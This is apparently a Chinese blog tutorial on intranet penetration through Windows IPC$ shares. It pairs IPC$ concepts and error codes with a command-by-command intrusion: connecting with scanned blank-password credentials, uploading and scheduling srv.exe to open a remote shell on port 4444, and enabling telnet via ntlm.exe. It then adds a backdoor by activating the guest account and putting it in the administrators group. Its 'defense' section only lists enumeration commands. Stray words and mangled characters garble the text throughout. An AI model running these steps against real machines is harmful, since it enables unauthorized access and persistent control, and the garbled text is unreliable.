4. 內網滲透之IPC$入侵

IPC$鏈接ios

IPC$的概念:windows

IPC$(Internet Process Connection)是共享」命名管道」的資源,它是爲了讓進程間通訊而開放的
命名管道,能夠經過驗證用戶名和密碼得到相應的權限,在遠程管理計算機和查看計算機的共享資源時使用。

IPC$的做用:網絡

利用IPC$,鏈接者甚至能夠與目標主機創建一個鏈接,利用這個鏈接,鏈接者能夠獲得目標主機上的目錄結構、用戶列表等信息。

IPC$的利用條件:spa

1. 139,445端口開啓     
ipc$鏈接能夠實現遠程登錄及對默認共享的訪問;而139端口的開啓表示netbios協議的應用,咱們能夠經過
139,
445(win2000)端口實現對共享文件/打印機的訪問,所以通常來說,ipc$鏈接是須要139或445端口來支持的.

2. 管理員開啓了默認共享
默認共享是爲了方便管理員遠程管理而默認開啓的共享,即全部的邏輯盤(c$,d$,e$……)和系統目錄winnt或
windows(admin$),咱們經過ipc$鏈接能夠實現對這些默認共享的訪問

IPC$鏈接失敗的緣由:操作系統

1.你的系統不是NT或以上操做系統.
2.對方沒有打開ipc$默認共享。
3.不能成功鏈接目標的139,445端口.
4.命令輸入錯誤.
5.用戶名或密碼錯誤.

常見錯誤號:.net

1.錯誤號5,拒絕訪問 : 極可能你使用的用戶不是管理員權限的,先提高權限;
2.錯誤號51,Windows 沒法找到網絡路徑 : 網絡有問題;
3.錯誤號53,找不到網絡路徑 : ip地址錯誤;目標未開機;目標lanmanserver服務未啓動;目標有防火牆(端口過濾);
4.錯誤號67,找不到網絡名 : 你的lanmanworkstation服務未啓動;目標刪除了ipc$; 
5.錯誤號1219,提供的憑據與已存在的憑據集衝突 : 你已經和對方創建了一個ipc$,請刪除再連。 6.錯誤號1326,未知的用戶名或錯誤密碼 : 緣由很明顯了; 7.錯誤號1792,試圖登陸,可是網絡登陸服務沒有啓動 : 目標NetLogon服務未啓動。(鏈接域控會出現此狀況) 8.錯誤號2242,此用戶的密碼已通過期 : 目標有賬號策略,強制按期要求更改密碼。

具體操做命令:code

1.創建IPC$空鏈接:server

net use \\127.0.0.1\ipc$ "" /user:""

2.創建完整的用戶名,密碼鏈接:blog

net use \\127.0.0.1\ipc$ "password" /user:"username"

3.映射路徑:進程

net use z: \\127.0.0.1\c$ "密碼" /user:"用戶名"  (便可將對方的c盤映射爲本身的z盤,其餘盤類推)

4.訪問/刪除路徑:

net use z: \\127.0.0.1\c$ #直接訪問 net use c: /del 刪除映射的c盤,其餘盤類推 net use * /del      刪除所有,會有提示要求按y確認

5.刪除IPC$鏈接:

net use \\127.0.0.1\ipc$ /del

6.入侵過程:

(1)

C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators" 

這是用《流光》掃到的用戶名是administrators,密碼爲""的IP地址,若是是打算攻擊的話,
就能夠用這樣的命令來與127.0.0.1創建一個鏈接,由於密碼爲"",因此第一個引號處就不用輸入,
後面一個雙引號裏的是用戶名,輸入administrators,命令便可成功完成。

(2)

C:\>copy srv.exe \\127.0.0.1\admin$ 
先複製srv.exe上去,在流光的Tools目錄下就有(這裏的$是指admin用戶的c:\winnt\system32\,
你們還可使用c$、d$,意思是C盤與D盤,這看你要複製到什麼地方去了)。

(3)

C:\>net time \\127.0.0.1 

查查時間,發現127.0.0.1 的當前時間是 2019/2/8 上午 11:00,命令成功完成。

(4)

C:\>at \\127.0.0.1 11:05 srv.exe 
用at命令啓動srv.exe吧(這裏設置的時間要比主機時間快,否則你怎麼啓動啊,呵呵!)

(5)

C:\>net time \\127.0.0.1

再查查到時間沒有?若是127.0.0.1 的當前時間是 2019/2/8 上午 11:05,說明srv.exe已經執行,那就準備開始下面的命令。

(6)

C:\>telnet 127.0.0.1 4444
這裏會用到Telnet命令吧,注意端口是4444。Telnet默認的是23端口,可是咱們使用的是srv.exe在對方計算機中爲咱們創建一個4444端口的Shell。 雖然咱們能夠Telnet上去了,可是srv.exe是一次性的,下次登陸還要再激活!因此咱們打算創建一個Telnet服務!這就要用到ntlm了

(7)

C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。

(8)

C:\WINNT\system32>ntlm 輸入ntlm啓動(這裏的C:\WINNT\system32>指的是對方計算機,運行ntlm實際上是讓這個程序在對方計算機上運行)。 當出現"DONE"的時候,就說明已經啓動正常。而後使用"net start telnet"來開啓Telnet服務! 

(9)

Telnet 127.0.0.1,接着輸入用戶名與密碼就進入對方了,操做就像在DOS上操做同樣簡單

(10)

爲了以防萬一,咱們再把guest激活加到管理組 C:\>net user guest /active:yes 將對方的Guest用戶激活

(11)

C:\>net user guest 123456
將Guest的密碼改成123456,或者你要設定的密碼

(12)

C:\>net localgroup administrators guest /add
將Guest變爲Administrator^_^(若是管理員密碼更改,guest賬號沒改變的話,下次咱們能夠用guest再次訪問這臺計算機)

7.如何防護IPC$入侵:

net share #查看本身的共享 net view \\IP #查看target的共享 netstat -A IP   #獲取target的user列表

8.netstat延伸使用:

netstat -ano | findstr "port"  #查看端口號對應的PID tasklist | findstr "PID"       #查看進程號對應的程序

 

參考鏈接:

內網滲透實戰-IPC$入侵之遠程控制

相關文章
相關標籤/搜索